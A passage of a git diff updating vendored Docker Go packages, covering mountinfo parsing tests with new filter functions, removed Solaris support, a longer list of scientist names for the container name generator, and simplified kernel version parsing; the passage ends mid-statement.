/var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered +191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered +195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered +199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered +203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered +207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered +211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered +215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered +219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered +223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered +227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered +231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered +235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered +239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered +243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered +247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered +31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1` ubuntuMountInfo = `15 20 0:14 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw 16 20 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw @@ -424,7 +426,7 @@ const ( func TestParseFedoraMountinfo(t *testing.T) { r := bytes.NewBuffer([]byte(fedoraMountinfo)) - _, err := parseInfoFile(r) + _, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -432,7 +434,7 @@ func TestParseFedoraMountinfo(t *testing.T) { func TestParseUbuntuMountinfo(t *testing.T) { r := bytes.NewBuffer([]byte(ubuntuMountInfo)) - _, err := parseInfoFile(r) + _, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -440,7 +442,7 @@ func TestParseUbuntuMountinfo(t *testing.T) { func TestParseGentooMountinfo(t *testing.T) { r := bytes.NewBuffer([]byte(gentooMountinfo)) - _, err := parseInfoFile(r) + _, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -448,7 +450,7 @@ func TestParseGentooMountinfo(t *testing.T) { func TestParseFedoraMountinfoFields(t *testing.T) { r := bytes.NewBuffer([]byte(fedoraMountinfo)) - infos, err := parseInfoFile(r) + infos, err := parseInfoFile(r, nil) if err != nil { t.Fatal(err) } @@ -474,3 +476,33 @@ func TestParseFedoraMountinfoFields(t *testing.T) { t.Fatalf("expected %#v, got %#v", mi, infos[0]) } } + +func TestParseMountinfoFilters(t *testing.T) { + r := bytes.NewReader([]byte(fedoraMountinfo)) + + infos, err := parseInfoFile(r, SingleEntryFilter("/sys/fs/cgroup")) + assert.NilError(t, err) + assert.Equal(t, 1, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, SingleEntryFilter("nonexistent")) + assert.NilError(t, err) + assert.Equal(t, 0, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, PrefixFilter("/sys")) + assert.NilError(t, err) + // there are 18 entries starting with /sys in fedoraMountinfo + assert.Equal(t, 18, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, PrefixFilter("nonexistent")) + assert.NilError(t, err) + assert.Equal(t, 0, len(infos)) + + r.Reset([]byte(fedoraMountinfo)) + infos, err = parseInfoFile(r, ParentsFilter("/sys/fs/cgroup/cpu,cpuacct")) + assert.NilError(t, err) + // there should be 4 results returned: /sys/fs/cgroup/cpu,cpuacct /sys/fs/cgroup /sys / + assert.Equal(t, 4, len(infos)) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go deleted file mode 100644 index ad9ab57f8b..0000000000 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_solaris.go +++ /dev/null @@ -1,37 +0,0 @@ -// +build solaris,cgo - -package mount - -/* -#include -#include -*/ -import "C" - -import ( - "fmt" -) - -func parseMountTable() ([]*Info, error) { - mnttab := C.fopen(C.CString(C.MNTTAB), C.CString("r")) - if mnttab == nil { - return nil, fmt.Errorf("Failed to open %s", C.MNTTAB) - } - - var out []*Info - var mp C.struct_mnttab - - ret := C.getmntent(mnttab, &mp) - for ret == 0 { - var mountinfo Info - mountinfo.Mountpoint = C.GoString(mp.mnt_mountp) - mountinfo.Source = C.GoString(mp.mnt_special) - mountinfo.Fstype = C.GoString(mp.mnt_fstype) - mountinfo.Opts = C.GoString(mp.mnt_mntopts) - out = append(out, &mountinfo) - ret = C.getmntent(mnttab, &mp) - } - - C.fclose(mnttab) - return out, nil -} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go index 7fbcf19214..fd16d3ed69 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_unsupported.go @@ -1,12 +1,12 @@ -// +build !windows,!linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo +// +build !windows,!linux,!freebsd freebsd,!cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "fmt" "runtime" ) -func parseMountTable() ([]*Info, error) { +func parseMountTable(f FilterFunc) ([]*Info, error) { return nil, fmt.Errorf("mount.parseMountTable is not implemented on %s/%s", runtime.GOOS, runtime.GOARCH) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go index dab8a37ed0..27e0f6976e 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_windows.go @@ -1,6 +1,6 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" -func parseMountTable() ([]*Info, error) { +func parseMountTable(f FilterFunc) ([]*Info, error) { // Do NOT return an error! return nil, nil } diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go index 8ceec84bc6..538f6637a0 100644 --- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux.go @@ -1,6 +1,4 @@ -// +build linux - -package mount +package mount // import "github.com/docker/docker/pkg/mount" // MakeShared ensures a mounted filesystem has the SHARED mount option enabled. // See the supported options in flags.go for further reference. diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go index c1837942e3..019514491f 100644 --- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_linux_test.go @@ -1,16 +1,21 @@ // +build linux -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "os" "path" - "syscall" "testing" + + "golang.org/x/sys/unix" ) // nothing is propagated in or out func TestSubtreePrivate(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -109,6 +114,10 @@ func TestSubtreePrivate(t *testing.T) { // Testing that when a target is a shared mount, // then child mounts propagate to the source func TestSubtreeShared(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -177,6 +186,10 @@ func TestSubtreeShared(t *testing.T) { // testing that mounts to a shared source show up in the slave target, // and that mounts into a slave target do _not_ show up in the shared source func TestSubtreeSharedSlave(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -281,6 +294,10 @@ func TestSubtreeSharedSlave(t *testing.T) { } func TestSubtreeUnbindable(t *testing.T) { + if os.Getuid() != 0 { + t.Skip("root required") + } + tmp := path.Join(os.TempDir(), "mount-tests") if err := os.MkdirAll(tmp, 0777); err != nil { t.Fatal(err) @@ -309,7 +326,7 @@ func TestSubtreeUnbindable(t *testing.T) { }() // then attempt to mount it to target. It should fail - if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != syscall.EINVAL { + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil && err != unix.EINVAL { t.Fatal(err) } else if err == nil { t.Fatalf("%q should not have been bindable", sourceDir) diff --git a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go b/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go deleted file mode 100644 index 09f6b03cbc..0000000000 --- a/vendor/github.com/docker/docker/pkg/mount/sharedsubtree_solaris.go +++ /dev/null @@ -1,58 +0,0 @@ -// +build solaris - -package mount - -// MakeShared ensures a mounted filesystem has the SHARED mount option enabled. -// See the supported options in flags.go for further reference. -func MakeShared(mountPoint string) error { - return ensureMountedAs(mountPoint, "shared") -} - -// MakeRShared ensures a mounted filesystem has the RSHARED mount option enabled. -// See the supported options in flags.go for further reference. -func MakeRShared(mountPoint string) error { - return ensureMountedAs(mountPoint, "rshared") -} - -// MakePrivate ensures a mounted filesystem has the PRIVATE mount option enabled. -// See the supported options in flags.go for further reference. -func MakePrivate(mountPoint string) error { - return ensureMountedAs(mountPoint, "private") -} - -// MakeRPrivate ensures a mounted filesystem has the RPRIVATE mount option -// enabled. See the supported options in flags.go for further reference. -func MakeRPrivate(mountPoint string) error { - return ensureMountedAs(mountPoint, "rprivate") -} - -// MakeSlave ensures a mounted filesystem has the SLAVE mount option enabled. -// See the supported options in flags.go for further reference. -func MakeSlave(mountPoint string) error { - return ensureMountedAs(mountPoint, "slave") -} - -// MakeRSlave ensures a mounted filesystem has the RSLAVE mount option enabled. -// See the supported options in flags.go for further reference. -func MakeRSlave(mountPoint string) error { - return ensureMountedAs(mountPoint, "rslave") -} - -// MakeUnbindable ensures a mounted filesystem has the UNBINDABLE mount option -// enabled. See the supported options in flags.go for further reference. -func MakeUnbindable(mountPoint string) error { - return ensureMountedAs(mountPoint, "unbindable") -} - -// MakeRUnbindable ensures a mounted filesystem has the RUNBINDABLE mount -// option enabled. See the supported options in flags.go for further reference. -func MakeRUnbindable(mountPoint string) error { - return ensureMountedAs(mountPoint, "runbindable") -} - -func ensureMountedAs(mountPoint, options string) error { - // TODO: Solaris does not support bind mounts. - // Evaluate lofs and also look at the relevant - // mount flags to be supported. - return nil -} diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go index 18a939b70b..7fd5955beb 100644 --- a/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/cmd/names-generator/main.go @@ -2,10 +2,13 @@ package main import ( "fmt" + "math/rand" + "time" "github.com/docker/docker/pkg/namesgenerator" ) func main() { + rand.Seed(time.Now().UnixNano()) fmt.Println(namesgenerator.GetRandomName(0)) } diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go index cfb8157d69..5c3395aaaa 100644 --- a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator.go @@ -1,9 +1,8 @@ -package namesgenerator +package namesgenerator // import "github.com/docker/docker/pkg/namesgenerator" import ( "fmt" - - "github.com/docker/docker/pkg/random" + "math/rand" ) var ( @@ -56,7 +55,6 @@ var ( "jolly", "jovial", "keen", - "kickass", "kind", "laughing", "loving", @@ -95,6 +93,7 @@ var ( "upbeat", "vibrant", "vigilant", + "vigorous", "wizardly", "wonderful", "xenodochial", @@ -151,6 +150,9 @@ var ( // Alexander Graham Bell - an eminent Scottish-born scientist, inventor, engineer and innovator who is credited with inventing the first practical telephone - https://en.wikipedia.org/wiki/Alexander_Graham_Bell "bell", + // Karl Friedrich Benz - a German automobile engineer. Inventor of the first practical motorcar. https://en.wikipedia.org/wiki/Karl_Benz + "benz", + // Homi J Bhabha - was an Indian nuclear physicist, founding director, and professor of physics at the Tata Institute of Fundamental Research. Colloquially known as "father of Indian nuclear programme"- https://en.wikipedia.org/wiki/Homi_J._Bhabha "bhabha", @@ -190,6 +192,15 @@ var ( // Subrahmanyan Chandrasekhar - Astrophysicist known for his mathematical theory on different stages and evolution in structures of the stars. He has won nobel prize for physics - https://en.wikipedia.org/wiki/Subrahmanyan_Chandrasekhar "chandrasekhar", + //Sergey Alexeyevich Chaplygin (Russian: Серге́й Алексе́евич Чаплы́гин; April 5, 1869 – October 8, 1942) was a Russian and Soviet physicist, mathematician, and mechanical engineer. He is known for mathematical formulas such as Chaplygin's equation and for a hypothetical substance in cosmology called Chaplygin gas, named after him. https://en.wikipedia.org/wiki/Sergey_Chaplygin + "chaplygin", + + // Asima Chatterjee was an indian organic chemist noted for her research on vinca alkaloids, development of drugs for treatment of epilepsy and malaria - https://en.wikipedia.org/wiki/Asima_Chatterjee + "chatterjee", + + // Pafnuty Chebyshev - Russian mathematician. He is known fo his works on probability, statistics, mechanics, analytical geometry and number theory https://en.wikipedia.org/wiki/Pafnuty_Chebyshev + "chebyshev", + //Claude Shannon - The father of information theory and founder of digital circuit design theory. (https://en.wikipedia.org/wiki/Claude_Shannon) "shannon", @@ -237,6 +248,9 @@ var ( // Gertrude Elion - American biochemist, pharmacologist and the 1988 recipient of the Nobel Prize in Medicine - https://en.wikipedia.org/wiki/Gertrude_Elion "elion", + // Alexandra Asanovna Elbakyan (Russian: Алекса́ндра Аса́новна Элбакя́н) is a Kazakhstani graduate student, computer programmer, internet pirate in hiding, and the creator of the site Sci-Hub. Nature has listed her in 2016 in the top ten people that mattered in science, and Ars Technica has compared her to Aaron Swartz. - https://en.wikipedia.org/wiki/Alexandra_Elbakyan + "elbakyan", + // Douglas Engelbart gave the mother of all demos: https://en.wikipedia.org/wiki/Douglas_Engelbart "engelbart", @@ -291,6 +305,9 @@ var ( // Werner Heisenberg was a founding father of quantum mechanics. https://en.wikipedia.org/wiki/Werner_Heisenberg "heisenberg", + // Grete Hermann was a German philosopher noted for her philosophical work on the foundations of quantum mechanics. https://en.wikipedia.org/wiki/Grete_Hermann + "hermann", + // Jaroslav Heyrovský was the inventor of the polarographic method, father of the electroanalytical method, and recipient of the Nobel Prize in 1959. His main field of work was polarography. https://en.wikipedia.org/wiki/Jaroslav_Heyrovsk%C3%BD "heyrovsky", @@ -309,6 +326,9 @@ var ( // Hypatia - Greek Alexandrine Neoplatonist philosopher in Egypt who was one of the earliest mothers of mathematics - https://en.wikipedia.org/wiki/Hypatia "hypatia", + // Mary Jackson, American mathematician and aerospace engineer who earned the highest title within NASA's engineering department - https://en.wikipedia.org/wiki/Mary_Jackson_(engineer) + "jackson", + // Yeong-Sil Jang was a Korean scientist and astronomer during the Joseon Dynasty; he invented the first metal printing press and water gauge. https://en.wikipedia.org/wiki/Jang_Yeong-sil "jang", @@ -318,6 +338,9 @@ var ( // Mary Lou Jepsen, was the founder and chief technology officer of One Laptop Per Child (OLPC), and the founder of Pixel Qi. https://en.wikipedia.org/wiki/Mary_Lou_Jepsen "jepsen", + // Katherine Coleman Goble Johnson - American physicist and mathematician contributed to the NASA. https://en.wikipedia.org/wiki/Katherine_Johnson + "johnson", + // Irène Joliot-Curie - French scientist who was awarded the Nobel Prize for Chemistry in 1935. Daughter of Marie and Pierre Curie. https://en.wikipedia.org/wiki/Ir%C3%A8ne_Joliot-Curie "joliot", @@ -327,12 +350,21 @@ var ( // A. P. J. Abdul Kalam - is an Indian scientist aka Missile Man of India for his work on the development of ballistic missile and launch vehicle technology - https://en.wikipedia.org/wiki/A._P._J._Abdul_Kalam "kalam", + // Sergey Petrovich Kapitsa (Russian: Серге́й Петро́вич Капи́ца; 14 February 1928 – 14 August 2012) was a Russian physicist and demographer. He was best known as host of the popular and long-running Russian scientific TV show, Evident, but Incredible. His father was the Nobel laureate Soviet-era physicist Pyotr Kapitsa, and his brother was the geographer and Antarctic explorer Andrey Kapitsa. - https://en.wikipedia.org/wiki/Sergey_Kapitsa + "kapitsa", + // Susan Kare, created the icons and many of the interface elements for the original Apple Macintosh in the 1980s, and was an original employee of NeXT, working as the Creative Director. https://en.wikipedia.org/wiki/Susan_Kare "kare", + // Mstislav Keldysh - a Soviet scientist in the field of mathematics and mechanics, academician of the USSR Academy of Sciences (1946), President of the USSR Academy of Sciences (1961–1975), three times Hero of Socialist Labor (1956, 1961, 1971), fellow of the Royal Society of Edinburgh (1968). https://en.wikipedia.org/wiki/Mstislav_Keldysh + "keldysh", + // Mary Kenneth Keller, Sister Mary Kenneth Keller became the first American woman to earn a PhD in Computer Science in 1965. https://en.wikipedia.org/wiki/Mary_Kenneth_Keller "keller", + // Johannes Kepler, German astronomer known for his three laws of planetary motion - https://en.wikipedia.org/wiki/Johannes_Kepler + "kepler", + // Har Gobind Khorana - Indian-American biochemist who shared the 1968 Nobel Prize for Physiology - https://en.wikipedia.org/wiki/Har_Gobind_Khorana "khorana", @@ -396,6 +428,9 @@ var ( // Kay McNulty - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Kathleen_Antonelli "mcnulty", + // Dmitri Mendeleev - a chemist and inventor. He formulated the Periodic Law, created a farsighted version of the periodic table of elements, and used it to correct the properties of some already discovered elements and also to predict the properties of eight elements yet to be discovered. https://en.wikipedia.org/wiki/Dmitri_Mendeleev + "mendeleev", + // Lise Meitner - Austrian/Swedish physicist who was involved in the discovery of nuclear fission. The element meitnerium is named after her - https://en.wikipedia.org/wiki/Lise_Meitner "meitner", @@ -417,6 +452,9 @@ var ( // Ian Murdock - founder of the Debian project - https://en.wikipedia.org/wiki/Ian_Murdock "murdock", + // John von Neumann - todays computer architectures are based on the von Neumann architecture. https://en.wikipedia.org/wiki/Von_Neumann_architecture + "neumann", + // Isaac Newton invented classic mechanics and modern optics. https://en.wikipedia.org/wiki/Isaac_Newton "newton", @@ -459,6 +497,9 @@ var ( // Laura Poitras is a director and producer whose work, made possible by open source crypto tools, advances the causes of truth and freedom of information by reporting disclosures by whistleblowers such as Edward Snowden. https://en.wikipedia.org/wiki/Laura_Poitras "poitras", + // Tat’yana Avenirovna Proskuriakova (Russian: Татья́на Авени́ровна Проскуряко́ва) (January 23 [O.S. January 10] 1909 – August 30, 1985) was a Russian-American Mayanist scholar and archaeologist who contributed significantly to the deciphering of Maya hieroglyphs, the writing system of the pre-Columbian Maya civilization of Mesoamerica. https://en.wikipedia.org/wiki/Tatiana_Proskouriakoff + "proskuriakova", + // Claudius Ptolemy - a Greco-Egyptian writer of Alexandria, known as a mathematician, astronomer, geographer, astrologer, and poet of a single epigram in the Greek Anthology - https://en.wikipedia.org/wiki/Ptolemy "ptolemy", @@ -510,6 +551,9 @@ var ( // Richard Matthew Stallman - the founder of the Free Software movement, the GNU project, the Free Software Foundation, and the League for Programming Freedom. He also invented the concept of copyleft to protect the ideals of this movement, and enshrined this concept in the widely-used GPL (General Public License) for software. https://en.wikiquote.org/wiki/Richard_Stallman "stallman", + // Lina Solomonovna Stern (or Shtern; Russian: Лина Соломоновна Штерн; 26 August 1878 – 7 March 1968) was a Soviet biochemist, physiologist and humanist whose medical discoveries saved thousands of lives at the fronts of World War II. She is best known for her pioneering work on blood–brain barrier, which she described as hemato-encephalic barrier in 1921. https://en.wikipedia.org/wiki/Lina_Stern + "shtern", + // Michael Stonebraker is a database research pioneer and architect of Ingres, Postgres, VoltDB and SciDB. Winner of 2014 ACM Turing Award. https://en.wikipedia.org/wiki/Michael_Stonebraker "stonebraker", @@ -522,6 +566,9 @@ var ( // Bertha Swirles was a theoretical physicist who made a number of contributions to early quantum theory. https://en.wikipedia.org/wiki/Bertha_Swirles "swirles", + // Valentina Tereshkova is a russian engineer, cosmonaut and politician. She was the first woman flying to space in 1963. In 2013, at the age of 76, she offered to go on a one-way mission to mars. https://en.wikipedia.org/wiki/Valentina_Tereshkova + "tereshkova", + // Nikola Tesla invented the AC electric system and every gadget ever used by a James Bond villain. https://en.wikipedia.org/wiki/Nikola_Tesla "tesla", @@ -537,12 +584,18 @@ var ( // Varahamihira - Ancient Indian mathematician who discovered trigonometric formulae during 505-587 CE - https://en.wikipedia.org/wiki/Var%C4%81hamihira#Contributions "varahamihira", + // Dorothy Vaughan was a NASA mathematician and computer programmer on the SCOUT launch vehicle program that put America's first satellites into space - https://en.wikipedia.org/wiki/Dorothy_Vaughan + "vaughan", + // Sir Mokshagundam Visvesvaraya - is a notable Indian engineer. He is a recipient of the Indian Republic's highest honour, the Bharat Ratna, in 1955. On his birthday, 15 September is celebrated as Engineer's Day in India in his memory - https://en.wikipedia.org/wiki/Visvesvaraya "visvesvaraya", // Christiane Nüsslein-Volhard - German biologist, won Nobel Prize in Physiology or Medicine in 1995 for research on the genetic control of embryonic development. https://en.wikipedia.org/wiki/Christiane_N%C3%BCsslein-Volhard "volhard", + // Cédric Villani - French mathematician, won Fields Medal, Fermat Prize and Poincaré Price for his work in differential geometry and statistical mechanics. https://en.wikipedia.org/wiki/C%C3%A9dric_Villani + "villani", + // Marlyn Wescoff - one of the original programmers of the ENIAC. https://en.wikipedia.org/wiki/ENIAC - https://en.wikipedia.org/wiki/Marlyn_Meltzer "wescoff", @@ -569,6 +622,9 @@ var ( // Ada Yonath - an Israeli crystallographer, the first woman from the Middle East to win a Nobel prize in the sciences. https://en.wikipedia.org/wiki/Ada_Yonath "yonath", + + // Nikolay Yegorovich Zhukovsky (Russian: Никола́й Его́рович Жуко́вский, January 17 1847 – March 17, 1921) was a Russian scientist, mathematician and engineer, and a founding father of modern aero- and hydrodynamics. Whereas contemporary scientists scoffed at the idea of human flight, Zhukovsky was the first to undertake the study of airflow. He is often called the Father of Russian Aviation. https://en.wikipedia.org/wiki/Nikolay_Yegorovich_Zhukovsky + "zhukovsky", } ) @@ -576,15 +632,14 @@ var ( // formatted as "adjective_surname". For example 'focused_turing'. If retry is non-zero, a random // integer between 0 and 10 will be added to the end of the name, e.g `focused_turing3` func GetRandomName(retry int) string { - rnd := random.Rand begin: - name := fmt.Sprintf("%s_%s", left[rnd.Intn(len(left))], right[rnd.Intn(len(right))]) + name := fmt.Sprintf("%s_%s", left[rand.Intn(len(left))], right[rand.Intn(len(right))]) if name == "boring_wozniak" /* Steve Wozniak is not boring */ { goto begin } if retry > 0 { - name = fmt.Sprintf("%s%d", name, rnd.Intn(10)) + name = fmt.Sprintf("%s%d", name, rand.Intn(10)) } return name } diff --git a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go index d1a94977d7..6ee31e9c33 100644 --- a/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go +++ b/vendor/github.com/docker/docker/pkg/namesgenerator/names-generator_test.go @@ -1,4 +1,4 @@ -package namesgenerator +package namesgenerator // import "github.com/docker/docker/pkg/namesgenerator" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go index 7738fc7411..94780ef610 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel.go @@ -2,7 +2,7 @@ // Package kernel provides helper function to get, parse and compare kernel // versions for different platforms. -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "errors" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go index 71f205b285..6e599eebcc 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_darwin.go @@ -2,7 +2,7 @@ // Package kernel provides helper function to get, parse and compare kernel // versions for different platforms. -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go index 744d5e1f83..8a9aa31225 100644 --- a/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go +++ b/vendor/github.com/docker/docker/pkg/parsers/kernel/kernel_unix.go @@ -1,13 +1,13 @@ -// +build linux freebsd solaris +// +build linux freebsd openbsd // Package kernel provides helper function to get, parse and compare kernel // versions for different platforms. -package kernel +package kernel // import "github.com/docker/docker/pkg/parsers/kernel" import ( "bytes" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) // GetKernelVersion gets the current kernel version. @@ -17,18 +17,8 @@ func GetKernelVersion() (*VersionInfo, error) { return nil, err } - release := make([]byte, len(uts.Release)) - - i := 0 - for _, c := range uts.Release { - release[i] = byte(c) - i++ - } - // Remove the \x00 from the release for Atoi to parse correctly - release = release[:bytes.IndexByte(release, 0)] - - return ParseRelease(string(release)) + return 